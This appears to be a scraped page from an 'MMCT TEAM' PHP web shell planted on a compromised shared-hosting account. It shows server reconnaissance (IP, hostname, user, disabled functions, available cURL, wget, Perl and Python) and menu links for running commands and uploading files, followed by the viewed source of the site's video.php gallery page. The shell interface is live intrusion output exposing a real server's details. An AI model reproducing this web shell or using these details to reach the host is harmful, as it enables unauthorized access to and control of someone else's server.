MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 3.144.93.34
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/adowoods.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/adowoods.com/video.php
<?php include 'header.php' ;?>

<section class="breadcrumbs breadcrumbs2 about wow fadeInDown" data-wow-duration="0.25s" data-wow-delay="0.45s">
<div class="boxedeb">
<div class="container page-block-small">
<div class="col-md-12 col-sm-12 col-xs-12">
<h1>Video</h1>
<span class="line"></span>
<div class="rightText">
<a href="<?=$site_url?>/index.php" title="Home">Home</a> / Video
</div>
</div>
</div>
</div>
</section>

<?php 
$video_query=db_query("SELECT * FROM tbl_video WHERE video_status='Active'");
?>

<section class="page-block-large BGlight">
<div class="container">
<div class="row">

<?php
while($video=mysqli_fetch_array($video_query)){?>
<div class="col-lg-4 col-md-4 col-sm-6 col-xs-12" >

<iframe width="350" height="350" src="https://www.youtube.com/embed/<?=$video['video_clip']?>" frameborder="0" allowfullscreen></iframe>
<div style="width:98%;border-left:2px solid red;background-color:white;padding:10px;"><a style="color:#FF7C1B;padding-left:5px;font-size:15px;font-weight:800"><?=$video['video_title']?></a></div>
</div>
<?php }?>



</div>
</div>
</section>


<?php include_once 'site-our-clients.php'; ?>
<?php include 'footer.php' ;?>

MMCT - 2023